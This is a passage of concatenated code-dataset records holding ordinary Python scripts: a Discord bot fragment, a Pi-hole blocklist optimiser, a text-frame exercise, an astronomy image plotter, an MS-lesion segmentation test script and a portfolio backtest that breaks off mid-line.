if voting[0] == voting[1]:\n await ctx.send(ret_str + 'Draw! Congratulations, both of you did well!')\n else:\n winner = voting[0] < voting[1]\n await ctx.send(ret_str + f'{players[winner].mention} wins the quote battle! What a fight!')\n\n except discord.errors.HTTPException:\n await ctx.send(self.bot.config['discord']['indicators'][\n 0] + ' An error occurred while counting the votes. Sorry for that. 
You can probably figure out who won yourself ;)')\n\n\nasync def setup(bot):\n await bot.add_cog(QuoteBattle(bot))\n","repo_name":"heggland/LotR-TriviaBot","sub_path":"cogs/quotebattle.py","file_name":"quotebattle.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"1209325390","text":"#!/usr/bin/env python\n\nimport os\nimport sqlite3\nimport re\nimport subprocess\nimport tempfile\nimport locale\n\n\ndef split_list(in_list, size):\n # Set action on parameters missing\n if not in_list:\n return\n if not size:\n size = 1000\n\n # Yield each sub-list\n for i in range(0, len(in_list), size):\n yield in_list[i:i + size]\n\n\n# Set locale automatically\nlocale.setlocale(locale.LC_ALL, '')\n\npath_pihole = r'/etc/pihole'\npath_dnsmasq = r'/etc/dnsmasq.d'\npath_legacy_regex = os.path.join(path_pihole, 'regex.list')\npath_legacy_gravity = os.path.join(path_pihole, 'gravity.list')\npath_pihole_db = os.path.join(path_pihole, 'gravity.db')\n\nset_gravity_domains = set()\nset_wildcard_domains = set()\nset_regexps = set()\nlist_removal_chunks = list()\nset_regexp_domain_matches = set()\nset_removal_domains = set()\ncount_db_gravity = None\n\ndb_exists = False\nc = None\nconn = None\n\n# Exit if not running as root\nif not os.getuid() == 0:\n print('Please run this script as root')\n exit(1)\nelse:\n print('[i] Root user detected')\n\n# Exit if Pi-hole dir does not exist\nif not os.path.exists(path_pihole):\n print(f'{path_pihole} was not found')\n exit(1)\nelse:\n print('[i] Pi-hole path exists')\n\nprint('[i] Updating gravity (this may take a little time)')\nsubprocess.call(['pihole', '-g'], stdout=subprocess.DEVNULL)\n\n# Determine whether we are using DB or not\nif os.path.isfile(path_pihole_db) and os.path.getsize(path_pihole_db) > 0:\n db_exists = True\n print('[i] DB detected')\nelse:\n print('[i] Legacy lists detected')\n\n# Fetch gravity domains\nprint('[i] Fetching domains')\n\nif db_exists:\n # Create a DB connection\n print(f'[i] Connecting to {path_pihole_db}')\n\n # Create a connection object\n try:\n conn = sqlite3.connect(path_pihole_db)\n except sqlite3.Error as e:\n print(e)\n exit(1)\n\n # Tell the text factory to ignore UTF-8 errors as\n # gravity doesn't yet accommodate for these pesky domains\n conn.text_factory = lambda b: b.decode(errors='ignore')\n # Create a cursor object\n c = conn.cursor()\n\n # Run query to fetch domains\n print('[i] Querying DB for gravity domains')\n c.execute('SELECT domain FROM gravity')\n set_gravity_domains.update(x[0] for x in c.fetchall())\nelse:\n # If gravity.list exists and isn't 0 bytes\n if os.path.exists(path_legacy_gravity) and os.path.getsize(path_legacy_gravity) > 0:\n # Read to set\n # Excluding non utf-8 characters that may have been introduced by list maintainers\n with open(path_legacy_gravity, 'r', encoding='utf-8', errors='ignore') as fOpen:\n set_gravity_domains.update(x for x in map(str.strip, fOpen) if x and x[:1] != '#')\n\n# If gravity domains were returned\nif set_gravity_domains:\n print(f'[i] --> {len(set_gravity_domains):n} domains found')\nelse:\n print('[i] No domains were found')\n exit(1)\n\n# If dnsmasq dir exists, extract wildcards\nif os.path.isdir(path_dnsmasq):\n print(f'[i] Scanning {path_dnsmasq} for wildcards')\n # Set the wildcard regexp\n regexp_wildcard = r'^address=\\/.+\\/(([0-9]{1,3}\\.){3}[0-9]{1,3}|::|#)?$'\n # For each file in dnsmasq dir\n for file in os.listdir(path_dnsmasq):\n # If it's a conf file and not the 
pi-hole conf\n if file.endswith('.conf') and file != '01-pihole.conf':\n # Create a subprocess command to run grep on the current file\n cmd = subprocess.Popen(['grep', '-E', regexp_wildcard, os.path.join(path_dnsmasq, file)],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8')\n # Run the command\n grep_result = [x.split('/')[1] for x in cmd.communicate()[0].split('\\n') if x]\n # Fetch the return code\n grep_return_code = cmd.returncode\n\n # If there were matches\n if grep_return_code == 0:\n # Add the wildcard domain to the wildcards set\n set_wildcard_domains.update(grep_result)\n\n # If wildcards are found\n if set_wildcard_domains:\n print(f'[i] --> {len(set_wildcard_domains):n} wildcards found')\n print(f'[i] Identifying wildcard conflicts with gravity')\n\n # Remove exact wildcard matches from gravity domains\n set_gravity_domains.difference_update(set_wildcard_domains)\n # Add exact wildcard matches to removal set\n set_removal_domains.update(set_wildcard_domains)\n\n # Initialise a temp file for marked gravity domains\n with tempfile.NamedTemporaryFile('w+') as temp_marked_gravity:\n # Initialise a temp file for marked wildcard domains\n with tempfile.NamedTemporaryFile('w+') as temp_marked_wildcard:\n # Write marked gravity domains\n for line in (f'^{x}$' for x in set_gravity_domains):\n temp_marked_gravity.write(f'{line}\\n')\n # Write marked wildcard domains\n for line in (f'.{x}$' for x in set_wildcard_domains):\n temp_marked_wildcard.write(f'{line}\\n')\n\n # Seek to start of files\n temp_marked_gravity.seek(0)\n temp_marked_wildcard.seek(0)\n\n # Create a subprocess command to run a fixed-string grep search\n # for wildcards against the domains\n cmd = subprocess.Popen(['grep', '-Ff', temp_marked_wildcard.name, temp_marked_gravity.name],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8')\n\n # Run the command\n grep_result = [x[1:-1] for x in cmd.communicate()[0].split('\\n') if x]\n # Fetch the return code\n grep_return_code = cmd.returncode\n\n # If there were matches\n if grep_return_code == 0:\n # Add to removal domains\n set_removal_domains.update(grep_result)\n # Remove from gravity domains\n set_gravity_domains.difference_update(grep_result)\n # Status update\n print(f'[i] --> {len(grep_result):n} conflicts found')\n\n # If there were no matches\n elif grep_return_code == 1:\n print('[i] --> 0 conflicts found')\n # If there was an error running grep\n elif grep_return_code == 2:\n print('[i] --> An error occurred when running grep command')\n else:\n print('[i] --> No wildcards found')\n\n# Fetch regexps\nprint('[i] Fetching regexps')\n\nif db_exists:\n c.execute('SELECT domain FROM domainlist WHERE TYPE = 3')\n set_regexps.update(x[0] for x in c.fetchall())\nelse:\n # If regex.list exists and isn't 0 bytes\n if os.path.exists(path_legacy_regex) and os.path.getsize(path_legacy_regex) > 0:\n # Read to set\n with open(path_legacy_regex, 'r', encoding='utf-8', errors='ignore') as fOpen:\n set_regexps.update(x for x in map(str.strip, fOpen) if x and x[:1] != '#')\n\nif set_regexps:\n print(f'[i] --> {len(set_regexps):n} regexps found')\n print('[i] Checking for gravity matches')\n\n # Initialise temp file for regexps\n with tempfile.NamedTemporaryFile('w+') as temp_regexps:\n # Initialise temp file for gravity\n with tempfile.NamedTemporaryFile('w+') as temp_gravity:\n # Add regexps to temp file\n for line in set_regexps:\n temp_regexps.write(f'{line}\\n')\n # Add gravity domains to temp file\n for line in set_gravity_domains:\n 
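# one domain per line, so the grep call below can match the regexps line-wise\n 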
temp_gravity.write(f'{line}\\n')\n\n # Seek to start of files\n temp_regexps.seek(0)\n temp_gravity.seek(0)\n\n # Create a subprocess command to run an extended-regexp grep search\n # for the regexps against the domains\n cmd = subprocess.Popen(['grep', '-Ef', temp_regexps.name, temp_gravity.name],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8')\n\n # Run the command\n grep_result = [x for x in cmd.communicate()[0].split('\\n') if x]\n # Fetch the return code\n grep_return_code = cmd.returncode\n\n # If there were matches\n if grep_return_code == 0:\n # Add to removal domains\n set_removal_domains.update(grep_result)\n # Remove from gravity domains\n set_gravity_domains.difference_update(grep_result)\n # Status update\n print(f'[i] --> {len(grep_result):n} matches found in gravity')\n\n # If there were no matches\n elif grep_return_code == 1:\n print('[i] --> 0 matches found in gravity')\n # If there was an error running grep\n elif grep_return_code == 2:\n print('[i] --> An error occurred when running grep command')\nelse:\n print('[i] --> No regexps found')\n\n# If any domains were flagged for removal, apply the deletions\nif set_removal_domains:\n\n if db_exists:\n print('[i] Running deletions')\n\n # Define list chunk size\n chunk_size = 1000\n\n # For each list chunk\n for chunk in split_list(list(set_removal_domains), chunk_size):\n # Run the deletions\n c.executemany('DELETE FROM gravity '\n 'WHERE domain IN (?)', [(x,) for x in chunk])\n\n # Commit Changes\n conn.commit()\n\n # Query actual DB count\n c.execute('SELECT COUNT(DISTINCT domain) FROM gravity')\n count_db_gravity = c.fetchall()[0][0]\n print(f'[i] --> {count_db_gravity:n} domains remain in the gravity database')\n\n # Update gravity_count in info table\n print('[i] Updating the gravity count in the info table')\n c.execute('INSERT OR REPLACE INTO info (property, value) VALUES (?, ?)', ('gravity_count', count_db_gravity))\n\n # Commit Changes\n conn.commit()\n\n conn.close()\n else:\n print('[i] Outputting updated gravity.list')\n\n # Output gravity set to gravity.list\n with open(path_legacy_gravity, 'w', encoding='utf-8') as fWrite:\n for line in sorted(set_gravity_domains):\n fWrite.write(f'{line}\\n')\n\n print(f'[i] --> {len(set_gravity_domains):n} domains remain in gravity.list')\n\n print('[i] Restarting Pi-hole')\n subprocess.call(['pihole', 'restartdns', 'reload'], stdout=subprocess.DEVNULL)\nelse:\n print('[i] No optimisation required')\n\",\"repo_name\":\"mmotti/pihole-gravity-optimise\",\"sub_path\":\"gravityOptimise.py\",\"file_name\":\"gravityOptimise.py\",\"file_ext\":\"py\",\"file_size_in_byte\":10610,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":55,\"dataset\":\"github-code\",\"pt\":\"40\"} +{\"seq_id\":\"9888642610\",\"text\":\"def messagePrint(number, message, thickness):\n\tboarder = thickness*\"|\"\n\tfor i in range(number):\n\t\tprint(boarder + \" \" + message + \" \" + boarder )\n\ndef boarder(length, thickness, placement):\n\tbar = \"-\" * (length + 2)\n\tif placement == \"TOP\":\t\t\n\t\tfor i in range(0, thickness):\n\t\t\tleft = \"|\"*i + \"+\" + \"-\"*(thickness - 1 - i)\n\t\t\tright = left[::-1]\n\t\t\tprint(left + bar + right)\n\telif placement == \"BOTTOM\":\n\t\tfor i in range(thickness-1, -1, -1):\n\t\t\tleft = \"|\"*i + \"+\" + \"-\"*(thickness - 1 - i)\n\t\t\tright = left[::-1]\n\t\t\tprint(left + bar + right)\ndef main():\n\tmessage = input(\"Enter the message:\\n\")\n\tcount = eval(input(\"Enter the message repeat count:\\n\"))\n\tthickness = 
eval(input(\"Enter the frame thickness:\\n\"))\n\tmessageLength = len(message)\n\tboarder(messageLength, thickness, \"TOP\")\n\tmessagePrint(count, message, thickness)\n\tboarder(messageLength, thickness, \"BOTTOM\")\n\t\nmain()\t\n\n'''\nEnter the message:\nHello World\nEnter the message repeat count:\n3\nEnter the frame thickness:\n2\n+---------------+\n|+-------------+|\n|| Hello World ||\n|| Hello World ||\n|| Hello World ||\n|+-------------+|\n+---------------+\n'''\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/smyjas002/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18774344827","text":"# Loads and plots the radmc3d-computed SEDs with and without star.\n# ============================================================================ #\n#\nimport numpy as np\nimport scipy as s\nfrom scipy import ndimage\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nrc('font',**{'family':'serif','serif':['serif']})\nrc('text', usetex=True)\n#\n# Useful Constants\n# \nfrom constants import *\nfrom inputdata import *\n#\n# useful function(s)\n#\nimport settickslabels\n#\n# ============================================================================ #\n#\n# Load the data. Flux density is in erg cm-2 s-1 Hz-1 ster-1.\n# Yes, manually change the filename :P\n# This variable is since I often have many images and want to switch between\n# them easily.\n#\nfilename = 'image50um_edgeon.out'\n#\nimagedata = open(filename, 'r').readlines()\nnpix = int(imagedata[1].split()[0])\npixsizeau = float(imagedata[3].split()[0]) / AUcm # Pixel size in AU\npixsize = pixsizeau / distance # and in asec\nwavelength = float(imagedata[4])\nimage1d = np.zeros(npix*npix)\nfor n,data in enumerate(imagedata[6:-2]):\n image1d[n] = float(data)\n#\n# Set up image axis\n#\nsizeau = npix * pixsizeau # Length of side of image in AU\nsizemas = sizeau / distance # Length of side of image in mas\naxisplot = [0.5*sizeau,-0.5*sizeau,-0.5*sizeau,0.5*sizeau]\naxisrange = np.linspace(-0.5*sizeau,0.5*sizeau,npix)\n#\n# Recalculate flux to Jy asec-2 at distance to the star\n# 1sec2 = 2.35044305391e-11 ster\n#\nimage1d = image1d * 1.e23 * asecsqster * pixsize**2.\n#\n# Extract limits\n#\nfluxmin,fluxmax = np.min(image1d),np.max(image1d)\nlogfluxrange = np.logspace(np.log10(fluxmax)-10.,np.log10(fluxmax),10)\n#\n# Extract 2D image from input image data\n#\nimage2d = np.zeros((npix,npix))\nlogimage2d = np.zeros((npix,npix))\nnpixtot = int(npix*npix)\nnx,ny = 0,0\nfor nn in range(npixtot):\n image2d[nx,ny] = image1d[nn]\n if image1d[nn] <= logfluxrange[0]:\n logimage2d[nx,ny] = np.log10(logfluxrange[0])\n else:\n logimage2d[nx,ny] = np.log10(image1d[nn])\n nx += 1\n if nx == npix:\n nx = 0\n ny += 1\n#\n# Apply filter to emulate telescope resolution\n# Sigma in pixels (FWHM is 5.6 asec, FWHM ~ 2 sqrt 2 ln sigma )\n#\nresolution = 5.6 / 2.355\nfiltimage2d = s.ndimage.gaussian_filter(image2d, sigma=resolution)\nfiltimagemax = np.max(filtimage2d)\nlogfiltimage2d = s.ndimage.gaussian_filter(logimage2d, sigma=resolution)\nlogmax = np.log10(filtimagemax)\n#\n# Plot and print outputs. 
==================================================== #\n#\nplt.ion()\n#\n# Image\n#\nplt.figure('Simulated original images')\nfor nn in range(6):\n plt.subplot(2,3,1+nn)\n plt.imshow(image2d, origin='lower', interpolation='nearest', vmin=fluxmin, vmax=np.logspace(-6,0,6)[nn]*fluxmax, extent=axisplot)\n cb = plt.colorbar(orientation = 'vertical',shrink=0.6,pad=0.15)\n cb.set_label(label = r'Flux density, (Jy/arcsec$^2$)',fontsize= 18)\n cb.ax.tick_params(labelsize=18)\n settickslabels.settickslabels(xlabel=\"Offset (AU)\", ylabel=\"Offset (AU)\", xscale=\"lin\", yscale=\"lin\")\n#\n# Filtered image\n#\nplt.figure('Simulated convolved image')\nplt.imshow(filtimage2d, origin='lower', interpolation='nearest', vmin=fluxmin, vmax=filtimagemax, extent=axisplot)\ncb = plt.colorbar(orientation = 'vertical',shrink=0.6,pad=0.15)\ncb.set_label(label = r'Flux density, (Jy/arcsec$^2$)',fontsize= 18)\ncb.ax.tick_params(labelsize=18)\nsettickslabels.settickslabels(xlabel=\"Offset (AU)\", ylabel=\"Offset (AU)\", xscale=\"lin\", yscale=\"lin\")\n#\n# Logged Filtered image\n#\nplt.figure('Simulated convolved logged image')\nplt.imshow(logfiltimage2d, origin='lower', interpolation='nearest', vmin=np.log10(logfluxrange[0]), vmax=logmax, extent=axisplot)\ncb = plt.colorbar(orientation = 'vertical',shrink=0.6,pad=0.15)\ncb.set_label(label = r'Log10 of flux density, (Jy/arcsec$^2$)',fontsize= 18)\ncb.ax.tick_params(labelsize=18)\nsettickslabels.settickslabels(xlabel=\"Offset (AU)\", ylabel=\"Offset (AU)\", xscale=\"lin\", yscale=\"lin\")\n#\n# Filtered image contours\n#\nplt.figure('Simulated convolved contours')\nplt.contour(axisrange,axisrange,filtimage2d,logfluxrange)\nsettickslabels.settickslabels(xlabel=\"Offset (AU)\", ylabel=\"Offset (AU)\", xscale=\"lin\", yscale=\"lin\")\n","repo_name":"jwiegert/astro-dust-codes","sub_path":"plotimageout.py","file_name":"plotimageout.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73928754360","text":"import torch\nimport torchvision.transforms as transforms\nfrom models import tiramisu\nfrom datasets import MSDataset\nfrom datasets import joint_transforms\nimport utils.training as train_utils\nfrom pathlib import Path\nimport os\nimport numpy\nimport random\n\n\n# Define options\nopt_defs = {}\n\n# Dataset options\nopt_defs[\"n_classes\"] = dict(flags = ('-nc', '--nclasses'), info=dict(default=2, type=int, help=\"num of classes\"))\nopt_defs[\"mean\"] = dict(flags = ('-mean', '--mean'), info=dict(default=0.1026, type=float, help=\"mean for dataset normalization\"))\nopt_defs[\"std\"] = dict(flags = ('-std', '--std'), info=dict(default=0.0971, type=float, help=\"std for dataset normalization\"))\n#opt_defs[\"dataset_path\"] = dict(flags = ('-dp', '--dataset-path'), info=dict(default=\"../../dataset/MS_Scan/dataset_Test_P2_T4\", type=str, help=\"path to dataset on IPLAB\"))\n#opt_defs[\"dataset_path\"] = dict(flags = ('-dp', '--dataset-path'), info=dict(default=\"./dataset/ISBI_2015\", type=str, help=\"path to dataset\"))\nopt_defs[\"dataset_path\"] = dict(flags = ('-dp', '--dataset-path'), info=dict(default=\"D:/Alessia/2_MS_Project_Gruppo_Imaging/dataset/ISBI_2015/ISBI_2015_PC\", type=str, help=\"path to dataset on PC\"))\nopt_defs[\"test_dataset\"] = dict(flags = ('-td','--test-dataset',), info=dict(default='test1', type=str, help=\"test1-5\"))\nopt_defs[\"weights_path\"] = dict(flags = ('-wp', '--weights-path'), info=dict(default=\"./tiramisu_weights_ms/\", 
type=str, help=\"path to weights\"))\nopt_defs[\"base_output_path\"] = dict(flags = ('-bop', '--base-output-path'), info=dict(default=\"/Patient-\", type=str, help=\"where to save output\"))\nopt_defs[\"patient_name\"] = dict(flags = ('-pn', '--patient-name'), info=dict(default='Patient-', type=str, help=\"patient name\"))\nopt_defs[\"patients\"] = dict(flags = ('-patients', '--patients'), info=dict(default=[1], nargs ='+', type=int, help=\"patients to test\"))\n\n# Model options\nopt_defs[\"lstm_kernel_size\"] = dict(flags = ('-lstmkernel','--lstm-kernel-size',), info=dict(default=3, type=int, help=\"lstm kernel size\"))\nopt_defs[\"lstm_num_layers\"] = dict(flags = ('-lstmnumlayers','--lstm-num-layers',), info=dict(default=1, type=int, help=\"lstm kernel size\"))\nopt_defs[\"use_sa\"] = dict(flags = ('-usesa', '--use-sa'), info=dict(default=True, type=bool, help=\"use Squeeze and Attention blocks (use:True, not use: False)\"))\nopt_defs[\"use_stn\"] = dict(flags = ('-usestn', '--use-stn'), info=dict(default=False, type=bool, help=\"use stn (use:True, not use: False)\"))\nopt_defs[\"use_lstm\"] = dict(flags = ('-ulstm', '--use-lstm'), info=dict(default=False, type=bool, help=\"use lstm (use:True, not use: False)\"))\nopt_defs[\"seq_size\"] = dict(flags = ('-ss', '--seq-size'), info=dict(default=1, type=int, help=\"sequence size\"))\nopt_defs[\"sliding_window\"] = dict(flags = ('-sw', '--sliding-window'), info=dict(default=True, type=bool, help=\"use sliding window (compute the loss only w.r.t. the central slice in the sequence)(use:True, not use: False)\"))\nopt_defs[\"bidirectional\"] = dict(flags = ('-bi', '--bidirectional'), info=dict(default=False, type=bool, help=\"bidirectional c-lstm (use:True, not use: False)\"))\nopt_defs[\"input_dim\"] = dict(flags = ('-dim', '--input-dim'), info=dict(default=160, type=int, help=\"input dim\"))\n\n# Training options\nopt_defs[\"optim\"] = dict(flags = ('-o', '--optim'), info=dict(default=\"RMSprop\", help=\"optimizer\"))\nopt_defs[\"learning_rate\"] = dict(flags = ('-lr', '--learning-rate'), info=dict(default=1e-4, type=float, help=\"learning rate\"))\nopt_defs[\"learning_rate_decay_by\"] = dict(flags = ('-lrdb', '--learning-rate-decay-by'), info=dict(default=0.995, type=float, help=\"learning rate decay factor\"))\nopt_defs[\"learning_rate_decay_every\"] = dict(flags = ('-lrde', '--learning-rate-decay-every'), info=dict(default=10, type=int, help=\"learning rate decay period\"))\nopt_defs[\"weight_decay\"] = dict(flags = ('-wd', '--weight-decay',), info=dict(default=1e-4, type=float, help=\"weight decay\"))\nopt_defs[\"loss_type\"] = dict(flags = ('-lt', '--loss-type'), info=dict(default='dice', type = str, help=\"the type of loss, i.e. dice\"))\n\n# Checkpoint options\nopt_defs[\"weights_fname\"] = dict(flags = ('-wf', '--weights-fname'), info=dict(default=None, type=str, help=\"weights file name, i.e. 
'weights-#tag-#folder-#epochs.pth'\"))\n\n# Read options\nimport argparse\nparser = argparse.ArgumentParser()\nfor k,arg in opt_defs.items():\n print(arg[\"flags\"])\n parser.add_argument(*arg[\"flags\"], **arg[\"info\"])\nopt = parser.parse_args(None)\nprint(opt)\n\n\n#Dataset option\nn_classes = opt.nclasses\nmean = opt.mean\nstd = opt.std\nDATASET_PATH = Path(opt.dataset_path)\ntest_dir = opt.test_dataset\nWEIGHTS_PATH = Path(opt.weights_path)\nbase_output_path = opt.base_output_path\npatient_name = opt.patient_name\npatients = opt.patients\n\n# Model options\nlstm_kernel_size = opt.lstm_kernel_size\nlstm_num_layers = opt.lstm_num_layers\nuse_sa = opt.use_sa\nuse_stn = opt.use_stn\nuse_lstm = opt.use_lstm\nseq_size = opt.seq_size\nsliding_window = opt.sliding_window\nbidirectional = opt.bidirectional\ninput_dim = opt.input_dim\n\n# Training options\noptim = opt.optim\nlr = opt.learning_rate\nlr_decay = opt.learning_rate_decay_by\nweight_decay = opt.weight_decay\nloss_type = opt.loss_type\nnum_epochs = opt.num_epochs\n\n# Checkpoint options\nweights_fname = opt.weights_fname\n\n\ntorch.backends.cudnn.enabled = True\ntorch.backends.cudnn.deterministic=True\nseed = 1\nrandom.seed(seed)\nnumpy.random.seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.manual_seed(seed)\n\n\nif seq_size > 1:\n use_lstm = True\n use_se = True\nelse:\n use_lstm = False\n use_se = True\n\n#SET DEVICE\ndev = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(dev)\n\ndice_vector = []\nsens_vector = []\nspec_vector = []\n\nif __name__ == '__main__':\n\n model = tiramisu.FCDenseNet67(loss_type=loss_type, n_classes=2, grow_rate = 12, use_stn=use_stn, use_se=use_se, seq_size=seq_size, use_lstm=use_lstm,\n lstm_kernel_size=lstm_kernel_size, lstm_num_layers=lstm_num_layers,\n bidirectional=bidirectional)\n model = model.to(dev)\n\n #SET OPTIMIZER\n if optim == 'SGD':\n optimizer = torch.optim.SGD(model.parameters(), lr=lr, weight_decay=weight_decay)\n elif optim == 'RMSprop':\n optimizer = torch.optim.RMSprop(model.parameters(), lr=lr, weight_decay=weight_decay)\n else:\n raise ValueError(\"Optimizer chosen not implemented!\")\n\n train_utils.load_weights(model, optimizer, os.path.join(WEIGHTS_PATH, weights_fname))\n model.eval()\n for p in patients:\n print(p)\n\n test_dset = MSDataset.MSDataset(\n DATASET_PATH, test_dir, joint_transform=None,\n transform=transforms.Compose([\n transforms.ToTensor(),\n ]),seq_size=seq_size, sliding_window = sliding_window, input_dim = input_dim, patient_name = patient_name + str(p))\n\n test_loader = torch.utils.data.DataLoader(\n test_dset, batch_size=1, shuffle=False)\n print(\"Test patient: %d, size %d\" % (p, len(test_loader.dataset.imgs)))\n\n #set base_output_path\n weights_fname_ = weights_fname.split('.pth')\n weights_fname__ = weights_fname_.split('-')\n fold_id = weights_fname__[-2]\n print(\"Fold\" + fold_id + base_output_path + str(p))\n OUTPUT_PATH = Path(\"Fold\" + fold_id + base_output_path + str(p))\n OUTPUT_PATH.mkdir(exist_ok=True)\n\n test_dice, test_sens, test_spec, test_acc, test_err, test_ppv, test_npv, test_extra_frac, text_iou = train_utils.compute_output(model, test_loader, OUTPUT_PATH, seq_size, sliding_window)\n \n print(\"Dice: %4f\" % test_dice)\n dice_vector.append(test_dice)\n print(\"Sens: %4f\" % test_sens)\n sens_vector.append(test_sens)\n print(\"Spec: %4f\" % test_spec)\n spec_vector.append(test_spec)\n print(\"Acc: %4f\" % test_acc)\n print(\"Err: %4f\" % test_err)\n print(\"PPV: %4f\" % test_ppv)\n print(\"NPV: %4f\" % test_npv)\n 
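# the remaining metrics are printed per patient but not aggregated across patients\n 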
print(\"Extra Fraction: %4f\" % test_extra_frac)\n print(\"IOU: %4f\" % text_iou)\n\n\n print(\"Dice MAX: %4f\" % numpy.max(numpy.array(dice_vector)))\n print(\"Dice mean: %4f\" % numpy.mean(numpy.array(dice_vector)))\n print(\"Dice std: %4f\" % numpy.std(numpy.array(dice_vector)))\n\n print(\"Sens mean: %4f\" % numpy.mean(numpy.array(sens_vector)))\n print(\"Sens std: %4f\" % numpy.std(numpy.array(sens_vector)))\n\n print(\"Spec mean: %4f\" % numpy.mean(numpy.array(spec_vector)))\n print(\"Spec std: %4f\" % numpy.std(numpy.array(spec_vector)))\n","repo_name":"ictlab-unict/attention-cnn-MS-segmentation","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"40"} +{"seq_id":"17657023728","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom pandas import Timestamp\nfrom pypfopt import EfficientFrontier\nfrom pypfopt import risk_models\nfrom pypfopt import expected_returns\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# 데이터 병합\nsectors_data = {}\nexcel_file_path = '../stocks_2000_2020_data_by_sector-2.xlsx'\nsnp_price_data = pd.ExcelFile(excel_file_path)\nfor sheet_name in snp_price_data.sheet_names:\n sheet_data = pd.read_excel(excel_file_path, sheet_name=sheet_name)\n sheet_data['Date'] = pd.to_datetime(sheet_data['Unnamed: 0'])\n sheet_data.set_index('Date', inplace=True)\n sheet_data.drop(columns='Unnamed: 0', inplace=True)\n sectors_data[sheet_name] = sheet_data\n\n# 데이터프레임 생성\ndf = pd.DataFrame()\nfor sector, data in sectors_data.items():\n data.columns = [f\"{sector}_{col}\" for col in data.columns]\n if df.empty:\n df = data\n else:\n df = df.join(data, how='outer')\n\n# 로그수익률 시계열 생성\nreturn_df = np.log(df / df.shift(1))\n\n# 날짜 계산\ninvest_start_day = return_df.index[return_df.index>='2003-01-01'][0]\nlearn_window = 60\ninvest_window = 20\ninvest_end_day = return_df.index[return_df.index.tolist().index(invest_start_day) + invest_window]\nlearn_start_day = return_df.index[return_df.index.tolist().index(invest_start_day) - learn_window]\nlearn_end_day = return_df.index[return_df.index.tolist().index(invest_start_day) - 1]\nreturns_all = [0]\nwhile invest_end_day< Timestamp('2020-12-30'):\n # 학습 데이터 수집\n learn_data = df.loc[learn_start_day:learn_end_day].dropna(axis=1)\n learn_data = learn_data.iloc[:, :100]\n # 포트폴리오 계산\n mu = expected_returns.mean_historical_return(learn_data)\n S = risk_models.sample_cov(learn_data)\n ef = EfficientFrontier(mu, S)\n try:\n ef.min_volatility()\n w = ef.clean_weights()\n w_df = pd.DataFrame([w.values()], columns=w)\n # 수익률 계산\n returns = []\n for i, v in enumerate(w_df):\n returns.append(np.log(df.loc[invest_end_day, v] / df.loc[invest_start_day, v]))\n w_df.loc[1] = returns\n w_df.loc[2] = w_df.loc[0] * w_df.loc[1]\n this_return = w_df.loc[2].sum()\n except:\n print('error')\n this_return = 0\n returns_all.append(this_return)\n # 다음 투자 기간으로 리밸런싱\n next_invest_end_index = return_df.index.tolist().index(invest_end_day) + invest_window + 1 # 다음 투자기간 종료\n next_invest_start_index = return_df.index.tolist().index(invest_start_day) + invest_window + 1 # 다음 투자기간 시작\n\n # 인덱스가 범위를 벗어나는지 확인\n if next_invest_end_index >= len(return_df.index) or next_invest_start_index >= len(return_df.index):\n break\n\n # 다음 투자 update\n invest_start_day = return_df.index[next_invest_start_index]\n invest_end_day = return_df.index[next_invest_end_index]\n learn_start_day = return_df.index[next_invest_start_index 
- learn_window]\n learn_end_day = return_df.index[next_invest_start_index - 1]\n\n# 월별 로그수익률 계산\nmonthly_returns = returns_all\n\ndf_monthly_returns = pd.DataFrame(monthly_returns, columns=['0'])\ndf_monthly_returns.reset_index(inplace=True)\ndf_monthly_returns.rename(columns={\"index\": \"Unnamed: 0\"}, inplace=True)\ndf_monthly_returns.to_csv(\"monthly_returns_markowitz.csv\", index=False)\n\n\n# monthly_returns_df = pd.DataFrame({'Date': df.index[1:len(monthly_returns) + 1], 'Cumulative_Log_Return': np.cumsum(monthly_returns)})\n# monthly_returns_df.to_csv(\"monthly_returns_markowitz.csv\", index=False)\n\n# monthly_cumulative_returns_df = pd.DataFrame({'Date': df.index[1:len(monthly_returns)+1], 'Cumulative_Log_Return': np.cumsum(monthly_returns)})\n# monthly_cumulative_returns_df.to_csv(\"markowitz_cumulative_returns.csv\", index=False)\n\n# 연 로그수익률, 표준편차 계산\nannual_log_return = np.mean(monthly_returns) * 12 / invest_window * 20\nannual_volatility = np.std(monthly_returns) * np.sqrt(12/invest_window*20) # 연별 표준편차\n\n\n# 1. Sharpe Ratio\nrisk_free_rate = 0.02\nsharpe_ratio = (annual_log_return - risk_free_rate) / annual_volatility\n\n\n# 2. Sortino Ratio\ndownside_risks = [r for r in monthly_returns if r < 0]\ndownside_volatility = np.std(downside_risks) * np.sqrt(12)\nsortino_ratio = (annual_log_return - risk_free_rate) / downside_volatility\n\n\n# 3. Profit Factor\ngross_profit = sum([r for r in monthly_returns if r > 0])\ngross_loss = abs(sum([r for r in monthly_returns if r < 0]))\nprofit_factor = gross_profit / gross_loss if gross_loss != 0 else np.inf # gross_loss가 0이면 profit_factor는 무한대\n# 누적 수익률 계산\ncumulative_returns = np.cumsum(monthly_returns)\n\nprint(len(cumulative_returns))\n# MDD 계산\nrunning_max = np.maximum.accumulate(cumulative_returns)\ndrawdown = cumulative_returns - running_max\nmdd = np.min(drawdown) # MDD는 drawdown의 최소값\n\n# Calmar Ratio 계산\nif mdd != 0:\n calmar_ratio = annual_log_return / abs(mdd)\nelse:\n calmar_ratio = np.mean(cumulative_returns) # MDD가 0인 경우 평균 누적 수익률로 